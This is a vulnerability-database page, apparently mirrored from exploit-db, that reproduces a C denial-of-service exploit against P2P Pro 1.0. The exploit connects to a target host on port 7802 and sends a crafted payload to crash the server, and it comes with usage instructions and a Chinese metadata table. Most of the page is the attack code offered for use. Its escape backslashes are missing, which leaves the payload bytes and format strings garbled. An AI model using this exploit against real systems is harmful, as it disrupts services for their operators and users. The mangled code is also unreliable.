P2P Pro 1.0 – ‘command’ Denial of Service-安全小百科

P2P Pro 1.0 – ‘command’ Denial of Service

漏洞ID	1055363	漏洞类型
发布时间	2005-09-02	更新时间	2005-09-02
CVE编号	N/A	CNNVD-ID	N/A
漏洞平台	Windows	CVSS评分	N/A

|漏洞来源

https://www.exploit-db.com/exploits/1192

|漏洞详情

漏洞细节尚未披露

|漏洞EXP

/*
     P2P Pro Command DOS Exploit
 ------------------------------------
  Infam0us Gr0up - Securiti Research

 Info: infamous.2hell.com
 Vendor URL: http://www.digital-revolution.org/P2PPro.html

*/

#include string.h
#include winsock2.h 
#include stdio.h 

#pragma comment(lib, "ws2_32.lib") 

char doscore[] = 
"x3fx3fxbcx59x70 "
"x32x70x3fxe1 "
"x2bx5cx3fxa6xebxa6"
"x50x46x2bx5cx3fxa6xebxa6"
"x50x4fx57x4ex45x44x2ex74"
"x78x74x2bx5cx3fxa6xebxa6"
"x50x31x32x33x32x34x32x2ex6bx62";


int main(int argc, char *argv[]) 
{ 
WSADATA wsaData; 
WORD wVersionRequested; 
struct hostent *pTarget; 
struct sockaddr_in sock; 
char *target; 
int port,bufsize; 
SOCKET inetdos; 

if (argc < 2) 
{ 
printf("        P2P Pro Command DOS Exploit n", argv[0]);
printf("  --------------------------------------n", argv[0]);
printf("    Infam0us Gr0up - Securiti Researchnn", argv[0]);
printf("[-]Usage: %s [target] [port]n", argv[0]); 
printf("[?]Exam: %s localhost 7802n", argv[0]); 
exit(1); 
} 

wVersionRequested = MAKEWORD(1, 1); 
if (WSAStartup(wVersionRequested, &wsaData) < 0) return -1; 

target = argv[1]; 
port = 7802; 

if (argc >= 3) port = atoi(argv[2]); 
bufsize = 1024; 
if (argc >= 4) bufsize = atoi(argv[3]); 

inetdos = socket(AF_INET, SOCK_STREAM, 0); 
if(inetdos==INVALID_SOCKET) 
{ 
printf("Socket ERROR n"); 
exit(1); 
} 
printf("    P2P Pro Command DOS Exploit n", argv[0]);
printf("  --------------------------------------rnn", argv[0]);
printf("Resolve host... "); 
if ((pTarget = gethostbyname(target)) == NULL) 
{ 
printf("FAILED n", argv[0]); 
exit(1); 
} 
printf("[OK]n ");
memcpy(&sock.sin_addr.s_addr, pTarget->h_addr, pTarget->h_length); 
sock.sin_family = AF_INET; 
sock.sin_port = htons((USHORT)port); 

printf("[+] Connecting... "); 
if ( (connect(inetdos, (struct sockaddr *)&sock, sizeof (sock) ))) 
{ 
printf("FAILEDn"); 
exit(1); 
} 
printf("[OK]n");
printf("Target listen.. n"); 
printf("Sending bad procedure... "); 
if (send(inetdos, doscore, sizeof(doscore)-1, 0) == -1) 
{ 
printf("ERRORn"); 
closesocket(inetdos); 
exit(1); 
} 
printf("[OK]n ");
printf("[+] Server SHUTDOWNED!n"); 
closesocket(inetdos); 
WSACleanup(); 
return 0; 
}

// milw0rm.com [2005-09-02]

相关推荐: Nullsoft SHOUTcast权限许可和访问控制漏洞

Nullsoft SHOUTcast权限许可和访问控制漏洞漏洞ID 1206956 漏洞类型未知发布时间 1999-08-20 更新时间 1999-08-20 CVE编号 CVE-1999-1561 CNNVD-ID CNNVD-199908-039 漏…

文章版权归作者所有，未经允许请勿转载。

THE END